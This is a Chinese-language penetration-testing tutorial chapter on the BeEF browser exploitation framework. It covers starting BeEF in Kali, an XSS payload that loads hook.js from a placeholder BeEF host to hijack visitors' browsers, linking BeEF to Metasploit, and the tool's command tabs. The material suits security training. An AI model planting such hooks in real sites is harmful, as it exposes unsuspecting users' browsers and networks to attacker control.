BeEF是瀏覽器攻擊框架的簡稱,是一款專注于瀏覽器端的滲透測試工具。
官網[http://beefproject.com](http://beefproject.com)
kali中已經內置了BeEF,直接啟動輸入beef/beef登錄即可。

根據提示,訪問UI界面。
然后將下面代碼輸入到存在XSS漏洞的地方hook一個瀏覽器:
`<script src="http://BeEF主機-IP:3000/hook.js"></script>`

如上圖,已經成功hook瀏覽器。
**連接metasploit:**
(此部分選自[limit_anonymous](https://blog.csdn.net/u013526533)的51cto博客
原文地址:https://blog.csdn.net/u013526533/article/details/52449964 )
要使用Metasploit豐富的攻擊模塊,需要做些配置
此時先確定以把更新源換為國內的:
> 進入目錄/etc/apt/sources.list
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
> 然后更新系統:
> apt-get update
> apt-get upgrade
> apt-get dist-upgrade
> reboot
重啟之后
先切換進BEEF的目錄下面:cd /usr/share/beef-xss/
切換進去之后,里面有個config.yaml文件,進行編輯
把metasploit功能模塊,enable設置為true
然后在當前目錄切換到:cd extensions/metasploit/
需要配置三個地方:
~~~
host:本機IP
callback host:本機IP
{os: 'custom',path: '/usr/share/metasploit-framework/'}
~~~
然后啟動msfconsole控制臺,輸入:load msgrpc ServerHost=IP Pass=abc123 這里的IP設置為你本機IP,不要設置為127.0.0.1
這時重新打開一個窗口切換到BEEF目錄下:`cd /usr/share/beef-xss/`
然后輸入`./beef`來啟動BEEF
之后顯示加載了292個metasploit模塊,然后打開beef就可以看到加載的metasploit模塊了
**關于BeEF的選項夾和功能**
main:在運行一些命令模塊后,顯示瀏覽器的信息
logs:顯示連接日志
commands:命令模塊執行功能的地方
> 每個命令模塊都有一個交通圖燈,用來指示以下內容:
> 命令模塊對目標進行操作,并且對目標不可見
> 命令模塊針對目標工作,但目標可以看到
> 該命令模塊還未對目標進行驗證
> 該命令模塊不針對此目標進行工作

XssRays: XssRays選項卡允許用戶檢查頁面的鏈接、表單和URI路徑是否容易受到XSS的攻擊。
Rider: Rider選項卡允許您為鉤狀瀏覽器提交任意的HTTP請求。
Network:網絡選項卡允許您與托管瀏覽器的本地網絡上的主機進行交互。
* * * * *
使用案例(給被劫持瀏覽器彈窗口):
`commands-Misc-Raw JavaScript-Execute`
- 序言
- kali-Linux基本配置
- 忘記Root密碼
- 更新系統和軟件包
- Bash命令
- shell編程
- Linux的文件權限配置
- Linux日志文件
- 信息收集
- 被動信息收集
- 繞過CDN找真實IP
- IDS識別
- p0f-OS識別
- nmap端口掃描
- 搜索引擎
- 內網主機發現
- 使用SET社工包釣魚
- 漏洞發現
- Nessus策略漏掃
- AWVS集成漏掃
- w3af
- 其它漏掃
- 抓包改包
- Burpsite
- Fiddler
- Wireshark
- 漏洞利用
- Hydra爆破
- SQLmap
- Metasploit
- Beef
- antSwrod
- XSS前端工具
- Windows緩沖區溢出
- 后漏洞利用階段
- 免殺一句話
- 上傳工具
- 嗅探
- 本地提取
- 隱藏痕跡